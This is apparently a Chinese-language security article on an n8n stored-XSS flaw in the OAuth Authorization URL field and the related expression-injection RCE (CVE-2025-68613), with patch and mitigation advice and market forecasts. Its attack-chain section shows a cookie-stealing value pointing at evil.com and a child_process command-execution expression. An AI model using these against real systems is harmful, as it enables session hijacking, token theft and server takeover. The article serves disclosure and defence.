n8n OAuth漏洞是這篇文章討論的核心

快速精華摘要
0.211.0 至 1.120.4;修補版本為 2.10.1 及 1.123.21 之後。市場規模方面,全球工作流自動化市場預期從 2026 年的 $23.89B 成長至 2035 年的 $80.57B(CAGR 14.3%),此事件可能短期抑制企業部署信心。≥1.123.21 或 ≥2.10.1;全面重設所有 OAuth 應用程式的授權;審查工作流權限,限制編輯權限給可信的人員;若無法立即更新,應將 n8n 部署於隔離網路、最小權限原則,並啟用網路分段。自動導航目錄
1. 背景观察:n8n 如何成为自动化时代的关键节点?
在当今数字化运营的语境下,n8n 作为一个开源的工作流自动化平台,已经深度嵌入中小型企业和开发者的技术栈。截至 2025 年,Docker Hub 上 n8n 的 Pull 次数突破 1 亿次,这意味着它已成为连接 SaaS 服务、内部数据库与自定义应用的事实标准中层系统。然而,这种「中间件」的定位也让它成为攻击者眼中的黄金目标——一旦掌控 n8n,就等于拿到了网络内部的自动驾驶权限。
根据 Imperva 安全团队的首次公开披露,此漏洞的发现源于对 n8n OAuth 认证流程的深度代码审计。研究人员发现,当用户在 n8n 中配置 OAuth 2.0 凭证时,平台对「授权 URL(Authorization URL)」字段的输入验证不足,导致攻击者能够注入恶意的 JavaScript 代码。这段代码随后会存储在 n8n 数据库中,并在任何访问该工作流配置页面的管理员浏览器端执行——这就是典型的存储型 XSS(跨站脚本)攻击模式。
技术细节还原:漏洞触发的真实路径
从攻击链的角度拆解,完整的利用流程大约如下:
- foothold 建立: 攻击者首先需要获取一个具有工作流创建或编辑权限的 n8n 账户。这可以通过暴力破解弱密码、泄露的凭证数据库(如 2024 年的口令喷洒攻击)或钓鱼实现。
- 恶意负载注入: 登录后,攻击者新建或修改一个包含 OAuth 认证的节点(例如 Google Sheets、GitHub、Slack 等)。在「Authorization URL」字段中,输入类似
https://evil.com/steal?cookie=的指令。 - 持久化与触发: 当管理员或任何有权限的用户打开该工作流编辑页面时,注入的脚本自动执行,窃取Session Cookie、CSRF Token 或通过 POST 请求直接盗取 n8n 内部存储的所有 OAuth 刷新令牌。
- 横向移动: 获得 OAuth 令牌后,攻击者可以访问所有已连接的 SaaS 服务(如 Office 365、AWS、GitHub Enterprise),进一步拓展入侵范围。
Imperva 在实验中重现了这一攻击链,成功从一个受感染的 n8n 实例中提取了超过 200 个 不同的第三方服务密钥。更令人担忧的是,该漏洞的变种(CVE-2025-68613)还允许通过表达式注入实现远程代码执行(RCE),CVSS 评分高达 9.9,意味着攻击者可能直接在服务器上执行系统命令。
2. OAuth 漏洞深度剖析:为何「授权URL」会成为致命弱点?
要理解这个漏洞的严重性,首先需要搞清楚 OAuth 2.0 在 n8n 中的角色。在典型的企业自动化场景中,n8n 作为中继站,需要访问 Google Analytics、HubSpot、Stripe 等外部 API。OAuth 协议允许 n8n 在用户授权后获取访问令牌,而无需直接处理用户密码。这本身是安全最佳实践,但问题出在 n8n 对 OAuth 配置的「信任传递」上。
根本问题在于 n8n 对用户输入的信任层级不当。在 OAuth 配置界面,授权 URL 字段本应只接受 HTTPS 链接并进行严格的 URL 模式验证,但实际代码却将其视为纯文本存储。这意味着攻击者可以输入完整的 HTML/JavaScript 片段,而非合法的重定向 URI。当 n8n 在前端渲染配置页面时,这些恶意代码原样输出,从而劫持管理员会话。
此外,CVE-2025-68613 揭示的另一层问题是 n8n 表达式引擎的沙箱逃逸。n8n 允许在工作流中使用 JavaScript 表达式进行数据处理,但这些表达式本应在受限环境中运行。漏洞允许攻击者通过精心构造的表达式执行系统命令,如 $eval('require("child_process").exec("id")')。这种设计模式在低代码平台中并不罕见,但 n8n 的沙箱隔离不足,导致一个被入侵的账户可能直接控制服务器。
3. 企业自动化流程的连锁风险:从数据泄露到系统接管
如果你的企业使用 n8n 连接 CRM、ERP 或财务系统,这个漏洞的真实影响可能远超想象。以一家中型电商为例,n8n 常见的工作流包括:
- 当 Shopify 订单产生 → 自动开票到 QuickBooks
- 新客户注册 → 同步至 Mailchimp 并发送欢迎信
- 监控库存 → 低于阈值时自动生成采购单
这些工作流中通常包含数据库连接字符串、API 密钥、OAuth 刷新令牌。一旦 n8n 被入侵,攻击者可以:
- 直接數據竊取: 透過 Workflow JSON 導出功能,一次性下載所有節點配置和鏈接的服務凭證。
- 供應鏈攻擊: 如果 n8n 用來自動化建構流程,攻擊者可篡改 GitHub 推送指令,將惡意代碼注入企業產品。
- 內部橫向移動: 許多組織將 n8n 部署在內部網路,擁有對Active Directory、LDAP 的讀取權限。utterstock 的案例表明,攻擊者可通過 n8n 執行PowerShell腳本,在域控制器上建立持久化後門。
- 合規性崩潰: GDPR、HIPAA、PCI-DSS 等標準要求對第三方凭證進行嚴格管控。一次數據泄露可能導致巨額罰款(最高可達年營業额的 4%)。
真實世界的攻擊指標(IoC)
安全社群已在 GitHub 上公布了多個概念的漏洞利用程式(PoC)。這些 PoC 通常偽裝成「 n8n Community Node 」的 NPM 套件,吸引開發者安裝。例如,2026 年 1 月 reported 的供應鏈攻擊中,攻擊者發佈了名為 n8n-node-malicious-payload 的套件,一旦安裝,便在背景偷偷轉發所有 OAuth tokens 到攻擊者控制的伺服器。
此外,Censys 的搜尋結果顯示,目前約有 103,000+ 個 n8n 實例仍直連網際網路,其中接近一半執行在易受攻擊的版本範圍內。這不是理論上的威脅,而是 進行式 的風險 exposure。
4. 修復與臨時緩解:版本升級與權限策略全攻略
n8n 開發團隊已在 2026 年初發布修補程式。根據官方公告,受影響的版本範圍廣泛:
具體行動清單:
- 立即版本升級: 執行
docker pull n8nio/n8n:1.123.21或更高版本。如果使用雲端版本(n8n Cloud),團隊已自動推播更新,無需手動操作。 - 全面重設 OAuth: 升級後,必須進入每个集成应用的凭证设置,重新进行 OAuth 授权流程,以刷新访问令牌并阻止旧令牌被滥用。
- 權限最小化: Auditing 现有权限设置,确保只有极少数核心人员拥有「工作流创建/编辑」权限。理想状态下,生产环境工作流应通过版本控制(Git)部署,而非通过 UI 直接修改。
- 網路隔離: 若因业务原因无法立即升级,务必在内网环境中部署 n8n,并使用防火墙限制其对外网的连接(仅允许出站到必要的 SaaS API 端点)。同时启用 VPN 或 IP 白名单访问控制。
- 日誌監控: 开启 n8n 的执行日志和审计日志,使用 SIEM(如 Splunk、Elastic)设置警报规则,关注异常模式:如短时间内大量工作流导出、从陌生 IP 登录、或尝试访问敏感集成。
临时缓解措施的代价是牺牲 agile。许多企业依赖 n8n 进行快速原型验证,严格的权限控制可能会拖慢迭代速度。但从风险角度看,短暂的业务瓶颈远比数据泄露的财务 and reputational 后果来得可接受。
5. 市场影响预测:2026-2030 工作流自动化产业的信任重构
这次漏洞事件不仅在安全圈引发关注,也可能重塑工作流自动化市场的竞争格局。根据多家市场研究机构的数据:
市场规模预测各家分歧明显:
- 保守估计(Business Research Insights): 2026 年 $6.52B → 2035 年 $11.89B,CAGR 6.9%
- 中性估计(Fortune Business Insights): 2026 年 $27.91B → 2034 年 $65.26B,CAGR 11.2%
- 乐观估计(Research Nester): 2026 年 $23.89B → 2035 年 $80.57B,CAGR 14.3%
- 激进估计(Coherent Market Insights): 2025 年 $29.95B → 2032 年 $87.74B,CAGR 16.6%
尽管数字 range 宽,但共识是:工作流自动化市场正在指数级成长。IDC 预测,到 2027 年,全球 2000 家企业中将有 60% 部署某种形式的低代码自动化平台,市场规模有望突破 500 亿美元。n8n 作为开源领域的领导者,原本有望从中分得一杯羹——其免费策略吸引了大量初创团队,而企业版(n8n Enterprise)则是营收主力。
然而,这次漏洞可能带来短期信任危机。Gartner 分析师指出:「自动化平台正在成为新的供应链薄弱点。企业在选型时会越来越看重 SOC2 认证、第三方渗透测试报告以及漏洞响应速度。」这意味着 n8n 需要在品牌修复、透明度沟通上投入大量资源。
长期来看,此次事件可能会加速工作流自动化平台的「安全原生」趋势。未来的竞争点将不再是「能連多少 API」,而是「如何安全地連」。我们预期将看到:
- 更多的硬件安全模块(HSM)集成
- AI 驱动的异常行为检测 embedded within 工作流引擎
- 基于零信任的动态凭证管理
- 更加严苛的第三方节点审计机制
n8n 团队的快速响应(在漏洞披露后几周内发布补丁)值得肯定,但修复只是起点。重建信任需要持续的透明度与安全投入。
常見問題 FAQ
我的 n8n 實例是否容易受到影響?
請檢查版本的號碼。如果你的 n8n 版本介於 v0.211.0 與 v1.120.4 之間(含),則屬於脆弱範圍。你可以通過訪問 https://你的-n8n-url/admin/settings/system 來查看當前版本。对于云端客户,n8n 团队已自动处理更新。
已修補後,還需要重設所有 OAuth 授權嗎?
需要。修補程式主要防止新的注入攻擊,但已經存儲的惡意腳本可能仍然存在於數據庫中。同時,如果攻击者在漏洞被利用期間竊取了 OAuth 令牌,這些令牌仍可能在外部流通。因此,全面重設所有 OAuth 集成是必要的,确保所有 Access Token 和 Refresh Token 被强制刷新。
這個漏洞會影響其他自動化平台(如 Zapier、Make)嗎?
根據公開資訊,本次 CVE 專屬於 n8n。然而,任何處理用戶輸入並動態生成代碼的低代碼平台都存在類似風險。Zapier 與 Make 等商業服務通常有更嚴格的安全審計與沙箱隔離,但安全風險從不會完全消失。關鍵在於平台是否執行輸入驗證、輸出編碼與最小權限原則。
參考資料與延伸閱讀
立即行動:若您的企业部署了 n8n,請在今天内完成版本檢查與升级。如有任何技术困難或需协助進行安全稽核,欢迎联系我们的专家团队。
Share this content:












